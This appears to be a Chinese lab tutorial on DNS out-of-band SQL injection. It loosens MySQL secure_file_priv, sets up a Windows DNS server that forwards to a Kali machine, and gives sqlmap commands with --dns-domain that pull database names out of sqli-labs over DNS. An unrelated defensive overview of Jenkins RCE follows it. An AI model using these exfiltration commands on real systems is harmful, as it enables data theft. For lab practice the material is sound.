DNS外带注入

修改mysql的secure_file_priv属性

在我们进入MySQL进行查找的时候,他的值是为null,
在这里插入图片描述
所以需要对他进行修改,在配置文件my.ini中进行配置文件的修改。
在这里插入图片描述
然后以txt的形式将他打开,然后添加一句secure_file_priv=""的记录在mysqldb模块中。
在这里插入图片描述
在这里插入图片描述
修改好后重新启动mysql,然后再次查看,可以看到它的值变成这样就可以了。
在这里插入图片描述

配置dns服务器

1.添加角色:右键角色,选择添加角色

在这里插入图片描述
然后根据弹出来的页面选择下一步

在这里插入图片描述
然后勾选DNS服务器,(因为我安装了一个,所以这个我选的别的进行的演示。),然后点击下一步。
在这里插入图片描述
弹窗出来后选择仍要安装DHCP服务器,然后下一步。
在这里插入图片描述
后面的弹窗也是一直下一步,直到安装可以按了之后,点击安装就可以了。

2.添加正向查找

选中WIN-GNN1,然后选择正向查找区域,右键,选择新建区域。
在这里插入图片描述
然后跳出弹唱就直接选择下一步,就可以,然后默认它的选项选择主要区域,然后点击下一步。
在这里插入图片描述
然后建立一个区域名称,这里就随便写就可以了。
在这里插入图片描述
默认选项,选择下一步
在这里插入图片描述
默认选项,选择下一步
在这里插入图片描述
点击完成就可以了。
在这里插入图片描述
这样正向查找区域就创建成功了。
在这里插入图片描述

3.正向查找建立完毕之后,要对一些配置进行修改。

右键WIN哪个,然后点击属性。
在这里插入图片描述
选择高级,在高级中的服务器选项中有一个禁用递归,如果是勾上的一定要取消,因为服务器就是需要递归来进行转发的,如果勾上了也转发不了了。
在这里插入图片描述
在监视中,将简答查询和递归查询都是要勾上的,一定要使用到递归查询。
在这里插入图片描述
其余的就先不用管了。

4.新建主机

选择刚刚建好的区域名称,然后右键之后,选择新建主机。
在这里插入图片描述
填写主机名称和IP,名称就写的是ns,IP地址为你sqlmap所在虚机的ip地址。
在这里插入图片描述
在创建一个泛解析,ip地址依旧是和刚刚那个一样。
在这里插入图片描述
添加主机之后就创建完成了,然后把win11的虚拟机的dns服务修改为刚刚配置的服务器的ip地址。
在这里插入图片描述
然后使用win11的虚拟机取ping刚刚在服务端设置的域名,
并且在kali中输入tcpdump -n port 53;查看信息返回。
在这里插入图片描述
并且可以看到kali中是有返回信息的。
在这里插入图片描述

5.创建条件转发器

选择条件转发器,然后右键,新建一个条件转发器。
在这里插入图片描述
DNS域的域名可以随便写,但是就不要写和刚刚那个相同的就行。IP地址是匹配的kali的IP地址。
在这里插入图片描述
然后在win11上ping刚刚设置的转发IP就可以了,在kali中观察是否收到了日志。

SQLMap使用外带dns注入。

1.取到数据库
注入并查找到库民
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables

在这里插入图片描述

获取到数据表
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables 

在这里插入图片描述

获取user表中的列
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins Remote Code Execution (RCE) 是一种安全漏洞,在 Jenkins 中发现的一种远程代码执行攻击的可能性。Jenkins 是一款流行的开源持续集成/持续部署 (CI/CD) 工具,广泛用于自动化软件构建、测试和发布过程。 ### Jenkins RCE 的简述 1. **原理概述**:通常情况下,Jenkins 需要在网络上运行并访问,这意味着它暴露了一个服务端口。如果未正确配置权限控制和身份验证机制,恶意用户可能会通过特定的 HTTP 请求注入恶意脚本或命令,并由 Jenkins 执行,导致远程代码执行。这种攻击利用了服务器的安全配置错误或者存在脆弱的插件和配置设置。 2. **危害**:一旦发生 Jenkins RCE,攻击者可以获取对整个系统的完全控制权,包括但不限于执行任意系统命令、修改文件、安装软件、窃取敏感数据等。这可能导致严重的数据泄露、业务中断以及潜在的长期安全风险。 ### 防止 Jenkins RCE 的措施 1. **更新到最新版本**:定期检查 Jenkins 更新,及时应用官方发布的安全补丁和修复,因为大多数已知的漏洞都会在新版本中得到解决。 2. **权限管理**:限制 Jenkins 用户的访问权限,只赋予其完成任务所需的最少权限。避免使用管理员账户进行 Jenkins 操作,应使用具有有限权限的角色账号。 3. **HTTPS 部署**:启用 HTTPS 能有效防止中间人攻击和其他形式的数据窃取,提高通信安全性。 4. **禁用危险的插件**:评估所有第三方插件及其更新,移除不再需要或已被证实存在安全隐患的插件。 5. **强化输入验证**:对于用户提交的数据,实施严格的输入验证策略,过滤掉恶意字符或脚本,减少潜在的攻击面。 6. **监控日志**:定期审查 Jenkins 日志,以便尽早检测异常活动或可疑操作,有助于快速响应和预防潜在威胁。 7. **教育培训**:加强团队成员对安全最佳实践的理解,确保所有人都了解如何识别和报告潜在的漏洞。 8. **定期审计和渗透测试**:通过外部安全审计和内部渗透测试,定期检查 Jenkins 系统的安全状况,识别并修复潜在的风险点。 通过采取以上措施,可以显著降低 Jenkins 发生 RCE 类型攻击的风险,保护组织的 CI/CD 流程免受恶意攻击的影响。---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值